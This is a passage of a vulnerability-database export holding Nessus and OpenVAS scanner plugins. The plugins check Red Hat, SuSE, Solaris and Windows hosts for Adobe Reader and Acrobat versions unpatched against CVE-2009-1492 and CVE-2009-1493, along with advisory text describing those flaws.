Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader\nto crash or, potentially, execute arbitrary code as the user running\nAdobe Reader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. 
They\ncontain Adobe Reader version 8.1.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1493\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb09-06.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb09-06.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0478\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0478\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-8.1.5-2\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-plugin-8.1.5-2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-8.1.5-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-8.1.5-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-8.1.5-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-8.1.5-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:51", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-21T00:00:00", "published": "2009-09-24T00:00:00", "id": "SUSE_11_ACROREAD-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41363", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 899)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41363);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 899)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. 
(CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 899.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif 
(!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-8.1.5-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:17", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. 
Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.", "modified": "2018-11-15T00:00:00", "published": "2009-05-13T00:00:00", "id": "ADOBE_READER_911.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=38746", "title": "Adobe Reader getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38746);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2009-1492\");\n script_bugtraq_id(34736);\n script_xref(name:\"CERT\", value:\"970180\");\n script_xref(name:\"Secunia\", value:\"34924\");\n\n script_name(english:\"Adobe Reader getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The PDF file viewer on the remote Windows host is affected by a memory\ncorruption vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. 
Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa09-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 9.1.1 / 8.1.5 / 7.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Acroread/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\ninfo = NULL;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB item is missing.');\n\nforeach ver (vers)\n{\n if (\n ver && \n (\n ver =~ \"^[0-6]\\.\" ||\n ver =~ \"^7\\.(0\\.|1\\.[01]($|[^0-9]))\" ||\n ver =~ \"^8\\.(0\\.|1\\.[0-4]($|[^0-9]))\" ||\n ver =~ \"^9\\.(0\\.|1\\.0($|[^0-9]))\"\n )\n )\n {\n path = 
get_kb_item('SMB/Acroread/'+ver+'/Path');\n if (isnull(path)) exit(1, 'The \"SMB/Acroread/'+ver+'/Path\" KB item is missing.');\n\n verui = get_kb_item('SMB/Acroread/'+ver+'/Version_UI');\n if (isnull(verui)) exit(1, 'The \"SMB/Acroread/'+ver+'/Version_UI\" KB item is missing.');\n\n info += ' - ' + verui + ', under ' + path + '\\n';\n }\n}\n\nif (isnull(info)) exit(0, 'The remote host is not affected.');\n\nif (report_verbosity > 0)\n{\n if (max_index(split(info)) > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n}\nelse security_hole(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:44", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. 
Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.", "modified": "2018-11-15T00:00:00", "published": "2009-08-28T00:00:00", "id": "ADOBE_ACROBAT_911.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40804", "title": "Adobe Acrobat < 9.1.1 / 8.1.5 / 7.1.2 getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40804);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2009-1492\");\n script_bugtraq_id(34736);\n script_xref(name:\"CERT\", value:\"970180\");\n script_xref(name:\"Secunia\", value:\"34924\");\n\n script_name(english:\"Adobe Acrobat < 9.1.1 / 8.1.5 / 7.1.2 getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\na memory corruption vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. 
Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa09-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 9.1.1 / 8.1.5 / 7.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:'vuln_publication_date', value:'2009/05/01');\n script_set_attribute(attribute:'patch_publication_date', value:'2009/05/12');\n script_set_attribute(attribute:'plugin_publication_date', value:'2009/08/28');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\nversion = get_kb_item(\"SMB/Acrobat/Version\");\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\n\nif (\n version =~ \"^[0-6]\\.\" ||\n version =~ \"^7\\.(0\\.|1\\.[01]($|[^0-9]))\" ||\n version =~ \"^8\\.(0\\.|1\\.[0-4]($|[^0-9]))\" ||\n version =~ \"^9\\.(0\\.|1\\.0($|[^0-9]))\"\n)\n{\n version_ui = 
get_kb_item(\"SMB/Acrobat/Version_UI\");\n if (report_verbosity > 0 && version_ui)\n {\n path = get_kb_item(\"SMB/Acrobat/Path\");\n if (isnull(path)) path = \"n/a\";\n\n report = string(\n \"\\n\",\n \" Path : \", path, \"\\n\",\n \" Installed version : \", version_ui, \"\\n\",\n \" Fix : 9.1.1 / 8.1.5 / 7.1.2\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"Acrobat \"+version+\" is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:13:47", "bulletinFamily": "scanner", "description": "Check for the Version of Adobe Acrobat Reader", "modified": "2017-02-20T00:00:00", "published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=855744", "id": "OPENVAS:855744", "title": "Solaris Update for Adobe Acrobat Reader 121104-10", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Adobe Acrobat Reader 121104-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Adobe Acrobat Reader on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Adobe Acrobat Reader\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855744);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"121104-10\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_name(\"Solaris Update for Adobe Acrobat Reader 121104-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-121104-10-1\");\n\n script_summary(\"Check for the Version of Adobe Acrobat Reader\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"121104-10\", package:\"SUNWacroread\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-04T13:43:45", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to Denial of Service\n vulnerability.", "modified": "2018-12-03T00:00:00", "published": "2009-05-11T00:00:00", "id": "OPENVAS:1361412562310800701", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800701", "title": "Adobe Reader Denial of Service Vulnerability (May09)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_dos_vuln_may09_lin.nasl 12629 2018-12-03 15:19:43Z cfischer $\n#\n# Adobe Reader Denial of Service Vulnerability (May09)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800701\");\n script_version(\"$Revision: 12629 $\");\n script_cve_id(\"CVE-2009-1493\", \"CVE-2009-1492\");\n script_bugtraq_id(34740, 34736);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-03 16:19:43 +0100 (Mon, 03 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-11 08:41:11 +0200 (Mon, 11 May 2009)\");\n script_name(\"Adobe Reader Denial of Service Vulnerability (May09)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to Denial of Service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"These flaws are due to memory corruption errors in 'customDictionaryOpen'\n and 'getAnnots' methods in the JavaScript API while processing malicious PDF\n files with a long string in the second argument.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker cause memory corruption or\n denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.1 and prior on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.3.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"http://secunia.com/advisories/34924\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/50146\");\n script_xref(name:\"URL\", value:\"http://packetstorm.linuxsecurity.com/0904-exploits/spell.txt\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nreaderVer = ereg_replace(pattern:\"\\_\", replace:\".\", string:readerVer);\n\nif(readerVer == NULL){\n exit(0);\n}\n\nif(version_is_less_equal(version:readerVer, test_version:\"9.1\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:13", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. 
All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.", "modified": "2017-07-12T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63973", "id": "OPENVAS:63973", "title": "RedHat Security Advisory RHSA-2009:0478", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0478.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0478 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. 
(CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63973);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0478\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
